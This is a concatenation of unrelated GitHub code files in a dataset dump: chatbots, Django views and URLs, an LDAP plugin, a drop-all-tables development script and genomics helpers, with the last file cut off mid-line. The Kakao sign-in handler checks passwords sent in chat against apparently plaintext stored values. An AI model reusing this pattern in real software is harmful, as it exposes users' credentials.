bot.send_sticker(message.chat.id, 'CAACAgQAAxkBAAEGgDVjfGCm1WEyQ7WyEy6pnQF6uerHvwACGRUAAqbxcR54k5QMPt-zJisE')\n\nbot.polling()","repo_name":"AlushkaNutellka/3-mission_ne_dokonca","sub_path":"bots.py","file_name":"bots.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73037857184","text":"\"\"\"\nMerkabah Admin Urls\n\"\"\"\nfrom django.conf.urls.defaults import patterns, url\nfrom merkabah.admin import controllers as ac\n\nurlpatterns = patterns('',\n\n # Main index of the admin controller\n url(r'^$', ac.IndexCtrl.as_django_view(), name=ac.IndexCtrl.view_name),\n\n # Auth\n url(r'^auth/login/$', ac.AuthLoginCtrl.as_django_view(), name=ac.AuthLoginCtrl.view_name),\n url(r'^auth/logout/$', ac.AuthLogoutCtrl.as_django_view(), name=ac.AuthLogoutCtrl.view_name),\n\n # Plugin Controller Endpoints\n url(r'^plugin/(?P[A-Za-z0-9-_]+)/$', ac.PluginIndexCtrl.as_django_view(), name=ac.PluginIndexCtrl.view_name),\n url(r'^plugin/(?P[A-Za-z0-9-_]+)/(?P[A-Za-z0-9-_]+)/$', ac.PluginActionCtrl.as_django_view(), name=ac.PluginActionCtrl.view_name),\n\n\n# url(r'^plugin/(?P[A-Za-z0-9-_/:]+)/$', *admin_views.PluginCtrl.django_url_args()), \n# (r'^gallery/(?P[A-Za-z0-9-_/:]+)/$', 'gallery'),\n# (r'^category/artwork/(?P[A-Za-z0-9-_/:]+)/$', 'gallery'),\n#\n# url(r'^$', *admin_views.IndexCtrl.django_url_args()), \n \n \n)\n\n#urlpatterns += 
plugin_urls.urlpatterns\n","repo_name":"blainegarrett/merkabah","sub_path":"admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"42132105250","text":"import sys\nimport os\nimport datetime\n\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nimport models\n\ndef signIn(reqData):\n req = reqData['action']['detailParams']['user_id']['value'].split()\n userProfile = models.User.query.filter_by(userid=req[0]).first()\n if userProfile is not None:\n if userProfile.password == req[1]:\n if models.UserStatus.query.filter_by(id=userProfile.id).first() is None:\n models.db.session.add(models.UserStatus(userProfile.id))\n models.db.session.commit()\n \n if userProfile.kakaoKey is None:\n userProfile.kakaoKey = str(reqData['userRequest']['user']['id'])\n models.db.session.commit()\n \n print(\"\\n\" + str(req[0]) + \"님이 로그인 하셨습니다\\n\")\n res = {\n \"version\": \"2.0\",\n \"context\": {\n \"values\": [\n {\n \"name\": \"login_user\",\n \"lifeSpan\": 10,\n \"params\": {\n \"user_id\": req[0]\n }\n }\n ]\n },\n \"template\": {\n \"outputs\": [\n {\n \"simpleText\": {\n \"text\": \"\\\"\" + userProfile.userid + \"\\\"\" + \"님의 마이페이지 🔓\\n[칭호 없음]\"\n } \n }\n ],\n \"quickReplies\": [\n \n {\n \"label\": \"인벤토리 🎒\",\n \"action\": \"block\",\n \"blockId\": \"6109213f3dcccc79addb1958\"\n },\n {\n \"label\": \"활동 🏃‍♂️\",\n \"action\": \"block\",\n \"blockId\": \"610caea93dcccc79addb2654\"\n },\n \n {\n \"label\": \"시스템 🎈\",\n \"action\": \"block\",\n \"blockId\": \"61150c60199a8173c6c4ab47\"\n },\n \n \n ]\n }\n }\n else:\n res = {\n \"version\": \"2.0\",\n \"context\": {\n \"values\": [\n {\n \"name\": \"login_user\",\n \"lifeSpan\": 0,\n \"params\": {\n \"login_user\": None\n }\n }\n ]\n },\n \"template\": {\n \"outputs\": [\n {\n \"simpleText\": {\n \"text\": \"로그인 실패 🧐\\n(비밀번호 틀림)\"\n } \n }\n ],\n \"quickReplies\": [\n {\n \"blockId\": \"61076108a5a4854bcb94b9ba\",\n \"action\": \"block\",\n \"label\": \"다시입력 ✏️\"\n }\n ]\n }\n }\n \n else:\n res = {\n \"version\": \"2.0\",\n \"context\": {\n \"values\": [\n {\n \"name\": \"login_user\",\n \"lifeSpan\": 0,\n \"params\": {\n \"user_id\": None\n }\n }\n ]\n },\n \"template\": {\n \"outputs\": [\n {\n \"simpleText\": {\n \"text\": \"로그인 실패 🧐\\n(없는 아이디)\"\n } \n }\n ],\n \"quickReplies\": [\n {\n \"blockId\": \"61076108a5a4854bcb94b9ba\",\n \"action\": \"block\",\n \"label\": \"다시입력 ✏️\"\n },\n {\n \"blockId\": \"610b4ae0b39c74041ad0ea22\",\n \"action\": \"block\",\n \"label\": \"회원가입 🥕\"\n }\n ]\n }\n }\n return res\n \n \n \n \n","repo_name":"kuyang95/1319_KakaoChatBot","sub_path":"systemPart/signIn.py","file_name":"signIn.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30013362098","text":"\"\"\"\r\nDeletes all tables from the database, this is a development script and should never be called in a production envitonment.\r\n\"\"\"\r\n\r\nimport os\r\nimport os\r\nimport sys\r\nfrom sqlalchemy.engine import reflection\r\nfrom sqlalchemy.schema import DropConstraint, DropTable\r\nimport transaction\r\n\r\nimport random\r\nfrom jcudc24provisioning.controllers.authentication import DefaultPermissions, DefaultRoles\r\nfrom jcudc24provisioning.models import DBSession, Base\r\nfrom jcudc24provisioning.models.project import Location, ProjectTemplate, Project, Dataset, MethodSchema, MethodSchemaField, 
Project, MethodTemplate, Method, PullDataSource, DatasetDataSource\r\nfrom jcudc24ingesterapi.schemas.data_types import Double\r\nfrom jcudc24provisioning.models import website\r\n\r\nfrom sqlalchemy import engine_from_config, MetaData, ForeignKeyConstraint, Table\r\n\r\nfrom pyramid.paster import (\r\n get_appsettings,\r\n setup_logging,\r\n )\r\nfrom jcudc24provisioning.models.website import User, Role, Permission\r\n\r\ndef usage(argv):\r\n cmd = os.path.basename(argv[0])\r\n print('usage: %s \\n'\r\n '(example: \"%s development.ini\")' % (cmd, cmd)) \r\n sys.exit(1)\r\n\r\ndef main(argv=sys.argv):\r\n if len(argv) != 2:\r\n usage(argv)\r\n config_uri = argv[1]\r\n setup_logging(config_uri)\r\n settings = get_appsettings(config_uri)\r\n delete_all_tables(settings)\r\n\r\ndef delete_all_tables(settings):\r\n \"\"\"\r\n Initialise the database connection and delete all data base tables.\r\n\r\n :param settings:\r\n :return:\r\n \"\"\"\r\n\r\n # Initialise the database connection.\r\n engine = engine_from_config(settings, 'sqlalchemy.', pool_recycle=3600)\r\n\r\n conn = engine.connect()\r\n # the transaction only applies if the DB supports\r\n # transactional DDL, i.e. Postgresql, MS SQL Server\r\n trans = conn.begin()\r\n\r\n inspector = reflection.Inspector.from_engine(engine)\r\n\r\n # gather all data first before dropping anything.\r\n # some DBs lock after things have been dropped in\r\n # a transaction.\r\n\r\n metadata = MetaData()\r\n\r\n tbs = []\r\n all_fks = []\r\n\r\n for table_name in inspector.get_table_names():\r\n fks = []\r\n for fk in inspector.get_foreign_keys(table_name):\r\n if not fk['name']:\r\n continue\r\n fks.append(\r\n ForeignKeyConstraint((),(),name=fk['name'])\r\n )\r\n t = Table(table_name,metadata,*fks)\r\n tbs.append(t)\r\n all_fks.extend(fks)\r\n\r\n for fkc in all_fks:\r\n conn.execute(DropConstraint(fkc))\r\n\r\n for table in tbs:\r\n conn.execute(DropTable(table))\r\n\r\n trans.commit()","repo_name":"jcu-eresearch/dc24-rich-data-capture","sub_path":"jcudc24provisioning/scripts/delete_all_tables.py","file_name":"delete_all_tables.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"27592598757","text":"import json\n\nbase = {\n 'questCount' : 1,\n \n 'answers' : {\n '1': None,\n '2': None,\n '3': None,\n '4': None\n },\n\n 'account':{\n 'login' : None,\n 'pasword' : None,\n\n },\n\n 'enterInAccount' : False\n\n}\n\nwith open(\"data.json\", \"r\") as read_file:\n data = json.load(read_file)\n\n \t\nwith open(\"data.json\", \"w\") as write_file:\n json.dump(data, write_file, indent = 4)","repo_name":"nyarRoller/Sailor-Sender","sub_path":"dist/Sailor-Sender/data/jsonGenerator.py","file_name":"jsonGenerator.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35752969370","text":"#\n# An ldap data model plugin for hypnotoad.\n#\n\nimport ldap\nimport logging\n\nfrom hypnotoad.core import plugin\n\nLOG = logging.getLogger('root')\n\n\nclass ldap_plugin(plugin.data_model_plugin):\n\n def setup(self, config, model_version):\n \"\"\"Called before the plugin is asked to do anything.\"\"\"\n\n if config.getboolean('Data Model Options', 'ldap_plugin_enabled'):\n self.plugin_enabled = True\n LOG.debug(\"LDAP plugin enabled\")\n\n ldap_url = config.get('Data Model Options', 'ldap_server')\n ldap_dc = config.get('Data Model Options', 'ldap_dc')\n\n ldap_ou_group = 
config.get('Data Model Options', 'ldap_ou_group')\n ldap_ou_user = config.get('Data Model Options', 'ldap_ou_user')\n\n ldap_timeout = config.getfloat(\n 'Data Model Options', 'ldap_timeout')\n\n self.ldap_dn_user = \"ou=\" + ldap_ou_user + \",\" + ldap_dc\n self.ldap_dn_group = \"ou=\" + ldap_ou_group + \",\" + ldap_dc\n\n LOG.debug(\"URL: \" + ldap_url)\n LOG.debug(\"Base DC: \" + ldap_dc)\n LOG.debug(\"DN for groups: \" + self.ldap_dn_group)\n LOG.debug(\"DN for users: \" + self.ldap_dn_user)\n\n self.ldap_ctx = ldap.initialize(ldap_url)\n self.ldap_ctx.set_option(ldap.OPT_NETWORK_TIMEOUT, ldap_timeout)\n\n self.config = config\n self.model_version = model_version\n else:\n self.plugin_enabled = False\n\n def teardown(self):\n \"\"\"Called to allow the plugin to free anything.\"\"\"\n\n if self.plugin_enabled:\n LOG.debug(\"Got to ldap plugin teardown\")\n self.ldap_ctx.unbind_s()\n\n def get_model(self):\n \"\"\"Look up information in this data model.\"\"\"\n\n model = []\n\n if self.plugin_enabled:\n LOG.debug(\"Got to ldap plugin get_model\")\n\n model.append(\n {'little_lang_entry': {'version': self.model_version}})\n\n def ldap_search(dn, attrs):\n return self.ldap_ctx.search_s(dn, ldap.SCOPE_SUBTREE, '(cn=*)', attrs)\n\n users = ldap_search(self.ldap_dn_user, [\n 'cn', 'gidNumber', 'homeDirectory', 'uid',\n 'uidNumber', 'gecos', 'hpcDRMadef', 'loginShell'\n ])\n\n LOG.debug(\"Found \" + str(len(users)) + \" users.\")\n\n for u in users:\n dn, attrs = u\n\n model.append({'user_entry': {\n 'short_name_string': attrs['uid'][0],\n 'full_name_string': attrs['cn'][0],\n 'group_id_integer': attrs['gidNumber'][0],\n 'user_id_integer': attrs['uidNumber'][0],\n 'home_directory_string': attrs['homeDirectory'][0],\n 'login_shell_string': attrs['loginShell'][0],\n 'priority_fairshare_float': '',\n 'priority_qos_name_array': ''\n }})\n\n groups = ldap_search(\n self.ldap_dn_group, ['cn', 'hpcDRMshare', 'memberUid'])\n\n for g in groups:\n dn, attrs = g\n LOG.debug(\"Found group with DN: \" + dn)\n model.append({'group_entry': {\n 'short_name_string': attrs['cn'][0],\n 'priority_fairshare_float': attrs['hpcDRMshare'][0],\n }})\n\n return model\n\n# EOF\n","repo_name":"hpc/hypnotoad","sub_path":"hypnotoad/plugins/datamodels/ldap/ldap_plugin.py","file_name":"ldap_plugin.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21320441431","text":"arr=['A','B','C']\npath=['']*5\n\n\ndef abc(level):\n if level==2:\n for j in range(len(path)):\n print(path[j], end='')\n print()\n return\n\n for i in range(3):\n path[level]=arr[i]\n abc(level+1)\n\nabc(0)","repo_name":"giokim12/Algorithm","sub_path":"mincoding/22/min_22_1.py","file_name":"min_22_1.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35662426601","text":"NECROMANCY_AGONY = 59411\nNECROMANCY_AGONY_NEW = 59412\nNECROMANCY_AGONY_OLD = 59413\nNECROMANCY_ANIMATE_DEAD_NEW = 59414\nNECROMANCY_ANIMATE_DEAD_OLD = 59415\nNECROMANCY_ANIMATE_SKELETON = 59416\nNECROMANCY_ANIMATE_SKELETON_NEW = 59417\nNECROMANCY_ANIMATE_SKELETON_OLD = 59418\nNECROMANCY_BOLT_OF_DRAINING_NEW = 59419\nNECROMANCY_BOLT_OF_DRAINING_OLD = 59420\nNECROMANCY_BONE_SHARDS = 59421\nNECROMANCY_BORGNJORS_REVIVIFICATION_NEW = 59422\nNECROMANCY_BORGNJORS_REVIVIFICATION_OLD = 59423\nNECROMANCY_CIGOTUVIS_DEGENERATION = 59424\nNECROMANCY_CIGOTUVIS_EMBRACE = 59425\nNECROMANCY_CONTROL_UNDEAD 
= 59426\nNECROMANCY_CONTROL_UNDEAD_NEW = 59427\nNECROMANCY_CONTROL_UNDEAD_OLD = 59428\nNECROMANCY_CORPSE_ROT_NEW = 59429\nNECROMANCY_CORPSE_ROT_OLD = 59430\nNECROMANCY_DEATH_CHANNEL = 59431\nNECROMANCY_DEATH_CHANNEL_NEW = 59432\nNECROMANCY_DEATH_CHANNEL_OLD = 59433\nNECROMANCY_DEATHS_DOOR_NEW = 59434\nNECROMANCY_DEATHS_DOOR_OLD = 59435\nNECROMANCY_DISPEL_UNDEAD_NEW = 59436\nNECROMANCY_DISPEL_UNDEAD_OLD = 59437\nNECROMANCY_EXCRUCIATING_WOUNDS_NEW = 59438\nNECROMANCY_EXCRUCIATING_WOUNDS_OLD = 59439\nNECROMANCY_FULSOME_DISTILLATION = 59440\nNECROMANCY_HAUNT_NEW = 59441\nNECROMANCY_HAUNT_OLD = 59442\nNECROMANCY_LETHAL_INFUSION = 59443\nNECROMANCY_NECROMUTATION_NEW = 59444\nNECROMANCY_NECROMUTATION_OLD = 59445\nNECROMANCY_PAIN_NEW = 59446\nNECROMANCY_PAIN_OLD = 59447\nNECROMANCY_REGENERATION_NEW = 59448\nNECROMANCY_REGENERATION_OLD = 59449\nNECROMANCY_SIMULACRUM_NEW = 59450\nNECROMANCY_SIMULACRUM_OLD = 59451\nNECROMANCY_SUBLIMATION_OF_BLOOD = 59452\nNECROMANCY_SUBLIMATION_OF_BLOOD_NEW = 59453\nNECROMANCY_SUBLIMATION_OF_BLOOD_OLD = 59454\nNECROMANCY_SYMBOL_OF_TORMENT = 59455\nNECROMANCY_SYMBOL_OF_TORMENT_NEW = 59456\nNECROMANCY_SYMBOL_OF_TORMENT_OLD = 59457\nNECROMANCY_TOMB_OF_DOROKLOHE = 59458\nNECROMANCY_TWISTED_RESURRECTION_NEW = 59459\nNECROMANCY_TWISTED_RESURRECTION_OLD = 59460\nNECROMANCY_VAMPIRIC_DRAINING_NEW = 59461\nNECROMANCY_VAMPIRIC_DRAINING_OLD = 59462\n","repo_name":"ProdigalNerd/EternalFacade","sub_path":"_assets/tile_refs/gui/spells/necromancy/necromancy.py","file_name":"necromancy.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6014120902","text":"import pickle\n\nfrom pdb import set_trace as T\nfrom query import BigQuery, format_response\n\nlambda_sql = '''\nSELECT\n pickup as station,\n count(*) as pickups\nFROM [nyc_taxi_data.yellow_filtered]\nGROUP BY station\nORDER by pickups DESC\n'''\nbq = BigQuery('nyc-taxi-trips-analysis')\n\nres = format_response(bq.query(lambda_sql))\npickle.dump(res, open('lambda.pkl', 'wb'))\n","repo_name":"megacell/MASS-attacks","sub_path":"param_inference/make_queries.py","file_name":"make_queries.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"72634276383","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\nY, X = map(int, input().split())\narea = []\nfor _ in range(Y):\n area.append(list(map(int, input().split())))\ndy = [0, 1, 1]\ndx = [1, 0, 1]\n\ncache = [[-1] * X for _ in range(Y)]\n\ndef candy(y, x):\n if cache[y][x] != -1:\n return cache[y][x]\n if y == Y-1 and x == X-1:\n return area[y][x]\n ret = 0\n for d in range(3):\n ny = y + dy[d]\n nx = x + dx[d]\n if 0 <= ny < Y and 0 <= nx < X:\n ret = max(ret, candy(ny, nx) + area[y][x])\n cache[y][x] = ret\n return ret\n\nprint(candy(0, 0))\n\nY, X = map(int, input().split())\narea = []\nfor _ in range(Y):\n area.append(list(map(int, input().split())))\ncache = [[0] * (X+1) for _ in range(Y+1)]\nfor i in range(1, Y+1):\n for j in range(1, X+1):\n cache[i][j] = area[i-1][j-1] + max(cache[i-1][j], cache[i][j-1], cache[i-1][j-1])\nprint(cache[Y][X])","repo_name":"ifhakhyeon/hakhyeon-s_note","sub_path":"파이썬/백준/백준 11048.py","file_name":"백준 11048.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42863067080","text":" \nfrom django.shortcuts import render, 
redirect\nfrom .models import Stock\nfrom .forms import StockForm, StockSearchForm, StockUpdateForm, IssueForm, ReceiveForm, ReorderLevelForm,CategoryCreateForm\nfrom django.contrib import messages\nfrom simple_history.utils import update_change_reason\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\n\n@login_required(login_url='/accounts/login/')\ndef add_items(request):\n\tform = StockForm(request.POST or None)\n\tif form.is_valid():\n\t\tform.save()\n\t\tmessages.success(request, 'Successfully Saved')\n\t\treturn redirect('/')\n\n\tcontext = {\n\t\t\"form\":form,\n\t\t\"title\":\"Add Item\"\n\t} \n\treturn render(request, 'store/add_item.html', context)\n\n@login_required(login_url='/accounts/login/')\ndef add_category(request):\n\tform = CategoryCreateForm(request.POST or None)\n\tif form.is_valid():\n\t\tform.save()\n\t\tmessages.success(request, 'Successfully Created')\n\t\treturn redirect('/')\n\tcontext = {\n\t\t\"form\": form,\n\t\t\"title\":\"Add Category\"\n\t}\n\treturn render(request, \"store/add_item.html\", context)\n\n@login_required(login_url='/accounts/login/')\ndef list_item(request):\n title = 'List of Items'\n form = StockSearchForm(request.POST or None)\n\n queryset = Stock.objects.all()\n\n if request.method == 'POST':\n queryset = Stock.objects.filter(\n product_name__icontains=form['product_name'].value()\n )\n context = {\n \"form\": form,\n \"header\": title,\n \"queryset\": queryset,\n }\n return render(request, \"store/list_item.html\", context) \n\n@login_required(login_url='/accounts/login/')\ndef update_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n form = StockUpdateForm(instance=queryset)\n if request.method == 'POST':\n form = StockUpdateForm(request.POST, instance=queryset)\n if form.is_valid():\n form.save()\n messages.success(request, 'Successfully Saved')\n return redirect('/')\n\n context = {\n 'form':form,\n\t\t\"title\":\"Update Item\"\n }\n return render(request, 'store/add_item.html', context) \n\n@login_required(login_url='/accounts/login/')\ndef delete_items(request, pk):\n queryset = Stock.objects.get(id=pk)\n if request.method == 'POST':\n queryset.delete()\n messages.success(request, 'Item deleted')\n return redirect('/')\n return render(request, 'store/delete_items.html') \n\ndef stock_detail(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tcontext = {\n\t\t\"queryset\": queryset,\n\t\t\"title\":\"Delete Item\"\n\t}\n\treturn render(request, \"store/stock_detail.html\", context) \n\n@login_required(login_url='/accounts/login/')\ndef issue_items(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tform = IssueForm(request.POST or None, instance=queryset)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.quantity -= instance.issued_quantity\n\t\tinstance.issue_by = str(request.user)\n\t\tmessages.success(request, \"Issued SUCCESSFULLY. 
\" + str(instance.quantity) + \" \" + str(instance.product_name) + \"s now left in Store\")\n\t\tinstance.save()\n\n\t\treturn redirect('/stock_detail/'+str(instance.id))\n\t\t\n\tcontext = {\n\t\t\"title\": 'Issue ' + str(queryset.product_name),\n\t\t\"queryset\": queryset,\n\t\t\"form\": form,\n\t\t\"username\": 'Issue By: ' + str(request.user),\n\t}\n\treturn render(request, \"store/add_item.html\", context)\n\n\n@login_required(login_url='/accounts/login/')\ndef receive_items(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tform = ReceiveForm(request.POST or None, instance=queryset)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.quantity += instance.received_quantity\n\t\tinstance.save()\n\t\tmessages.success(request, \"Received SUCCESSFULLY. \" + str(instance.quantity) + \" \" + str(instance.product_name)+\"s now in Store\")\n\n\t\treturn redirect('/stock_detail/'+str(instance.id))\n\t\t\n\tcontext = {\n\t\t\t\"title\": 'Receive ' + str(queryset.product_name),\n\t\t\t\"instance\": queryset,\n\t\t\t\"form\": form,\n\t\t\t\"username\": 'Receive By: ' + str(request.user),\n\t\t}\n\treturn render(request, \"store/add_item.html\", context)\n\n@login_required(login_url='/accounts/login/')\ndef reorder_level(request, pk):\n\tqueryset = Stock.objects.get(id=pk)\n\tform = ReorderLevelForm(request.POST or None, instance=queryset)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Reorder level for \" + str(instance.product_name) + \" is updated to \" + str(instance.alert_amount))\n\n\t\treturn redirect(\"/\")\n\tcontext = {\n\t\t\t\"instance\": queryset,\n\t\t\t\"form\": form,\n\t\t}\n\treturn render(request, \"store/add_item.html\", context) \n\n@login_required(login_url='/accounts/login/')\ndef list_history(request):\n\tqueryset = Stock.history.all()\n\n\tform = StockSearchForm(request.POST or None)\n\tif request.method == 'POST':\n\t\tqueryset = Stock.history.filter(\n\t\t\t\t\t\t\t\tproduct_name__icontains=form['product_name'].value()\n\t\t\t\t\t\t\t\t)\n\t\t\n\tcontext = {\n\t\t'historyset': queryset,\n\t\t'form': form\n\t}\n\treturn render(request, 'store/history.html', context)","repo_name":"Kadas36/Inventory","sub_path":"inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6696372154","text":"from __future__ import absolute_import\nfrom __future__ import division\n\nimport globals.constants as c\nif c.PYQT5notPYQT4:\n from PyQt5.QtWidgets import QGraphicsItem\n from PyQt5.QtGui import QPen\n from PyQt5 import QtCore\nelse:\n from PyQt4.QtGui import QGraphicsItem, QPen\n from PyQt4 import QtCore\n\n\nclass WpZero(QGraphicsItem):\n \"\"\"\n class WpZero\n \"\"\"\n def __init__(self, center, color=QtCore.Qt.gray):\n self.sc = None\n super(WpZero, self).__init__()\n\n self.center = center\n self.allwaysshow = False\n self.color = color\n self.pen = QPen(QtCore.Qt.darkGray, 1, QtCore.Qt.SolidLine)\n self.pen.setCosmetic(True)\n\n self.diameter = 23.0\n\n def contains_point(self, point):\n \"\"\"\n WpZero cannot be selected. 
Return maximal distance\n \"\"\"\n return float(0x7fffffff)\n\n def setSelected(self, *args):\n \"\"\"\n Override inherited function - with possibility to be called with multiple arguments\n \"\"\"\n pass\n\n def paint(self, painter, option, widget=None):\n \"\"\"\n paint()\n \"\"\"\n painter.setPen(self.pen)\n demat = painter.deviceTransform()\n self.sc = demat.m11()\n\n diameter1 = self.diameter / self.sc\n diameter2 = (self.diameter - 4) / self.sc\n\n rectangle1 = QtCore.QRectF(-diameter1 / 2, -diameter1 / 2, diameter1, diameter1)\n rectangle2 = QtCore.QRectF(-diameter2 / 2, -diameter2 / 2, diameter2, diameter2)\n startAngle1 = 90 * 16\n spanAngle = 90 * 16\n startAngle2 = 270 * 16\n\n painter.drawEllipse(rectangle1)\n painter.drawEllipse(rectangle2)\n painter.drawPie(rectangle2, startAngle1, spanAngle)\n\n painter.setBrush(self.color)\n painter.drawPie(rectangle2, startAngle2, spanAngle)\n\n def boundingRect(self):\n \"\"\"\n Override inherited function to enlarge selection of Arrow to include all\n @param flag: The flag to enable or disable Selection\n \"\"\"\n if not self.sc: # since this function is called before paint; and scale is unknown\n return QtCore.QRectF(0, 0, 1e-9, 1e-9)\n\n diameter = self.diameter / self.sc\n return QtCore.QRectF(-diameter / 2, -diameter / 2, diameter, diameter)\n","repo_name":"cnc-club/dxf2gcode","sub_path":"source/gui/wpzero.py","file_name":"wpzero.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"26503283406","text":"import os\nimport json\nfrom argparse import Namespace\nimport subprocess\nimport pandas as pd\nimport pybedtools\n\n\n###############################\n# read meta file; create args #\n###############################\n\ndef create_args(meta_file, lib_name):\n with open(meta_file, \"r\") as f: \n meta_dict = json.load(f)\n \n args = Namespace(\n # from metadata file\n library_prefix = meta_dict[lib_name][\"prefix\"],\n library_reps = meta_dict[lib_name][\"replicates\"],\n library_pair= meta_dict[lib_name][\"read_pairs\"],\n library_umi = meta_dict[lib_name][\"umi\"],\n library_suffix = meta_dict[lib_name][\"suffix\"],\n library_short = meta_dict[lib_name][\"shortform\"],\n reference_genome = meta_dict[\"genome\"][\"ref_fasta\"],\n reference_genome_twobit = meta_dict[\"genome\"][\"ref_twobit\"],\n roi_file = meta_dict[\"roi\"][\"filtered\"]\n )\n\n return args\n\n\n###################\n# filepath parser #\n###################\n\ndef get_lib_dapeak_filepath(store_dir, lib_short, da_type):\n peak_filepath = os.path.join(\n store_dir, lib_short, f\"{da_type}.bed\"\n )\n return peak_filepath\n\ndef get_enhancer_gene_mapped_file(store_dir, peak_desc, lib_short, method, da_type):\n return os.path.join(store_dir, peak_desc, lib_short, method, f\"{da_type}.tsv\")\n\ndef get_rnaseq_de_file(store_dir, lib_short):\n return os.path.join(store_dir, f\"{lib_short}_vs_CC.tsv\")\n\n\n#####################\n# peak to genes lfc #\n#####################\n\ndef parse_rnaseq_de_file(rnaseq_de_file):\n df = pd.read_csv(rnaseq_de_file, sep=\"\\t\")\n df.columns = [c.strip('\"') for c in df.columns]\n return df.loc[:, [\"gene_symbol\", \"logFC\", \"FDR\"]]\n\ndef parse_great_output(great_outfile):\n \"\"\"\n Returns enhancer mapped to their genes\n \"\"\"\n df = pd.read_csv(great_outfile, skiprows=3, sep=\"\\t\")\n df = df.loc[df.iloc[:, 0]==\"Ensembl Genes\"]\n df.Regions = df.Regions.str.split(\",\")\n df = df.explode(\"Regions\", ignore_index=True)\n df = 
df.loc[:, [\"Regions\", \"Genes\"]]\n df[[\"chrom\", \"start\"]] = df.Regions.str.split(\"-\", expand=True)[0].str.split(\":\", expand=True)\n df[\"end\"] = df.Regions.str.split(\"-\", expand=True)[1]\n df = df.astype({\"start\": int, \"end\": int})\n return df.loc[:, [\"chrom\", \"start\", \"end\", \"Genes\"]]\n\n\ndef link_enhancers_to_genes(great_outfile, rnaseq_de_file):\n df_great = parse_great_output(great_outfile)\n df_rnaseq = parse_rnaseq_de_file(rnaseq_de_file)\n df = df_great.merge(df_rnaseq, left_on=\"Genes\", right_on=\"gene_symbol\").drop(columns=[\"gene_symbol\"])\n return df.sort_values([\"chrom\", \"start\", \"end\"]).groupby([\"chrom\", \"start\", \"end\"]).agg(lambda x: x.to_list())\n\n\n#####################\n# peak to peaks lfc #\n#####################\n\ndef parse_peak_file(peak_file):\n df = pd.read_csv(peak_file, sep=\"\\t\", header=None, usecols=[0,1,2], names=[\"chrom\", \"start\", \"end\"])\n return df\n\ndef parse_meta_rpp_file(rpp_file, lib_short, cc_short):\n df_rpp = pd.read_csv(rpp_file, index_col=[0,1,2])\n df_rpp.index = df_rpp.index.rename([\"chrom\", \"start\", \"end\"])\n required_columns = [c for c in df_rpp.columns if ((c.startswith(lib_short)) or (c.startswith(cc_short)))]\n df_rpp = df_rpp.loc[:, required_columns]\n return df_rpp.reset_index()\n \ndef link_enhancers_to_libwise_rpp(meta_rpp_file, peak_file, lib_short, cc_short):\n df_peak = parse_peak_file(peak_file)\n df_rpp = parse_meta_rpp_file(meta_rpp_file, lib_short, cc_short)\n df = df_peak.merge(df_rpp, on=[\"chrom\", \"start\", \"end\"])\n return df\n\n\n##################\n# binding motifs #\n##################\n\ndef parse_tf_binding_file(tf_binding_file, tf_name_file):\n tfn = open(tf_name_file, \"r\") \n tf_name_dict = json.load(tfn)\n tfn.close()\n df = pd.read_csv(tf_binding_file, sep=\"\\t\")\n df[[\"chrom\", \"start\"]] = df.PositionID.str.split(\"-\", expand=True)[0].str.split(\":\", expand=True)\n df[\"end\"] = df.PositionID.str.split(\"-\", expand=True)[1]\n df = df.astype({\"start\": int, \"end\": int})\n df[\"Motif Name\"] = df[\"Motif Name\"].apply(lambda x: tf_name_dict.get(x, \"\"))\n return df.loc[:, [\"chrom\", \"start\", \"end\", \"Motif Name\"]]\n\ndef link_enhancers_to_binding_motifs(tf_binding_file, tf_name_file, peak_file):\n df_peak = parse_peak_file(peak_file)\n df_bind = parse_tf_binding_file(tf_binding_file, tf_name_file)\n df = df_peak.merge(df_bind, on=[\"chrom\", \"start\", \"end\"])\n return df.groupby([\"chrom\", \"start\", \"end\"]).agg(lambda x: sorted(set([i for i in x.to_list() if i])))\n\n\n#####################\n# chip intersection #\n#####################\n\ndef modify_empty_dataframe(df):\n if df.empty:\n df = pd.DataFrame(columns=[\"chrom\", \"start\", \"end\"])\n return df\n\ndef parse_chip_file(chip_dir, chip_type, chip_name):\n chip_files = [f.path for d in os.scandir(os.path.join(chip_dir, chip_type, chip_name)) for f in 